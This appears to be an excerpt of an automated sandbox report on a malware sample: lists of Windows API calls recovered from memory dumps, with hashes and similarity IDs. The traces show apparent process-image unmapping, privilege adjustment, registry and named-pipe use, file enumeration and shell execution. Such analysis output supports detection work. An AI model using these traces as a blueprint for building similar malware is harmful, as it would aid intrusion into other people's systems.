    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
